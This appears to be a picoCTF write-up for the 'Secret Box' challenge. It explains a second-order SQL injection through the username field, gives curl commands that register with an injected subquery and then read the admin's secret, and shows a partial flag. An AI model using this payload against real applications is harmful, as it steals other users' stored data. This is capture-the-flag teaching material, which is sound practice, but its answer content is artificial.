Secret Box

Description

Solution

1. Step 1Identify the injection point
   The application stores secrets associated with users. When a secret is created, the owner's username is used in the SQL query via string concatenation -- this is the injection vector. Register a new account with a malicious username containing a SQL payload.
2. Step 2Register with a SQL injection payload as your username
   Use a username that, when inserted into the 'secrets' query, causes the SQL to read the admin's secret instead of yours. The payload uses SQLite's string concatenation operator (||) to inject a subquery reading from the secrets table.
   # Register with this username (URL-encode the spaces and quotes):Copied!

   curl -c cookie.jar -d "username=' || (SELECT content FROM secrets WHERE owner_id='e2a66f7d-2ce6-4861-b4aa-be8e069601cb' LIMIT 1) || '&password=test123" \ http://<HOST>:<PORT_FROM_INSTANCE>/registerCopied!

   # Note: you may need to enumerate the admin's owner_id firstCopied!

   # Try registering normally, then observe how your own secret's owner_id appearsCopied!
3. Step 3Trigger the injection and read the admin's secret
   After registering with the malicious username, log in and create a secret. When the app builds the SQL query with your username, the injected subquery runs and returns the admin's secret content (which contains the flag) instead of your own.
   curl -b cookie.jar -d 'content=anything' http://<HOST>:<PORT_FROM_INSTANCE>/secrets/createCopied!

   curl -b cookie.jar http://<HOST>:<PORT_FROM_INSTANCE>/secretsCopied!

   # The flag appears in the 'content' field of your created secretCopied!

Flag

picoCTF{s3cr3t_b0x_0p3n3d_...}

Second-order SQL injection via the username field. The username is stored then inserted unsanitised into the secrets query. A subquery `(SELECT content FROM secrets WHERE owner_id='<admin-uuid>' LIMIT 1)` extracts the admin's flag when a secret is created.